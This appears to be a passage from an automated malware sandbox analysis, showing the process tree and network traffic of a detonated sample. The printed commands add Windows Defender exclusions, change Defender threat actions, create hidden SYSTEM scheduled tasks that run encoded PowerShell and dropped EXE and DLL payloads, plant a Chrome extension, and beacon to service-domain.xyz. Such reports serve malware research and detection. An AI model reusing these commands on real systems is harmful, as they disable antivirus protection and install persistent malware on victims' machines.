    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\REeMUtPoCvFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RcAuZGsZhuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kLpsRMujXEpbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tffvHWJZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NGysLhxJEZNwhMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mrYrpJCpOmktZWwz\" /t REG_DWORD /d 0 /reg:64;"
    2⤵
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3364
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:1376
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
        4⤵
        PID:2916
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:2928
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:2008
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:1236
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:2216
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:4608
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:648
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:2544
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:2964
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:1868
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:4064
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NGysLhxJEZNwhMVB /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:2552
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:2196
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:3828
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:1460
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:1064
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:32
      3⤵
      PID:4576
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mrYrpJCpOmktZWwz /t REG_DWORD /d 0 /reg:64
      3⤵
      PID:2792
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gYksPEqYp" /SC once /ST 00:03:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    2⤵
    • Creates scheduled task(s)
    PID:1628
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gYksPEqYp"
    2⤵
    PID:1136
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gYksPEqYp"
    2⤵
    PID:3836
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 00:05:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe\" 7d /Ysrcdidqp 525403 /S" /V1 /F
    2⤵
    • Drops file in Windows directory
    • Creates scheduled task(s)
    PID:5056
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
    2⤵
    PID:1708
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  1⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  PID:3544
  • C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    2⤵
    PID:2804
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
  1⤵
  PID:4020
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  1⤵
  PID:2160
• \??\c:\windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:1960
• C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe
                                                                                                                                                                  C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\RfVdqZS.exe 7d /Ysrcdidqp 525403 /S
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5064
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2592
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2208
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2204
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3388
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2588
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1596
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3068
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4612
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3876
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1556
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3496
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2784
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:3860
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4332
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:4040
                                                                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:4868
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2312
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2032
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3080
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3856
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2648
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\bMbSMy.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
    • Creates scheduled task(s)
    PID:3500
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\acexVhh.xml" /RU "SYSTEM"
    2⤵
    • Creates scheduled task(s)
    PID:4724
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "oiGBDDjiIQmhwtu"
    2⤵
    PID:3920
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"
    2⤵
    PID:2068
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\NpeMHAw.xml" /RU "SYSTEM"
    2⤵
    • Creates scheduled task(s)
    PID:4164
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\wPXELrG.xml" /RU "SYSTEM"
    2⤵
    • Creates scheduled task(s)
    PID:2228
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXbwydK.xml" /RU "SYSTEM"
    2⤵
    • Creates scheduled task(s)
    PID:1536
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\XnyNHtr.xml" /RU "SYSTEM"
    2⤵
    • Creates scheduled task(s)
    PID:2776
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 00:01:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll\",#1 /zLkdidL 525403" /V1 /F
    2⤵
    • Drops file in Windows directory
    • Creates scheduled task(s)
    PID:4380
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "dSPsRFCNvoTMekFez"
    2⤵
    PID:204
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"
    2⤵
    PID:424
• \??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll",#1 /zLkdidL 525403
  1⤵
  PID:3544
  • C:\Windows\SysWOW64\rundll32.exe
    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll",#1 /zLkdidL 525403
    2⤵
    • Blocklisted process makes network request
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Drops file in System32 directory
    • Enumerates system info in registry
    PID:1592
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"
      3⤵
      PID:216

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      54.210.117.250
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      54.210.117.250:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4 HTTP/1.1
                                                                                                                                                                                                                      Host: service-domain.xyz
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:14:18 GMT
                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                      Content-Length: 473
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                      Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                                                                                                                      Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      ec2-54-210-117-250 compute-1 amazonawscom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      a23-55-97-11deploystaticakamaitechnologiescom
• flag-us
  DNS 73.190.18.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  73.190.18.2.in-addr.arpa IN PTR
  Response
  73.190.18.2.in-addr.arpa IN PTR a2-18-190-73.deploy.static.akamaitechnologies.com
• flag-us
  DNS 202.187.250.142.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  202.187.250.142.in-addr.arpa IN PTR
  Response
  202.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f10.1e100.net
• flag-us
  DNS 67.169.217.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  67.169.217.172.in-addr.arpa IN PTR
  Response
  67.169.217.172.in-addr.arpa IN PTR lhr48s09-in-f3.1e100.net
• flag-us
  DNS clients2.google.com
  RfVdqZS.exe
  Remote address: 8.8.8.8:53
  Request
  clients2.google.com IN A
  Response
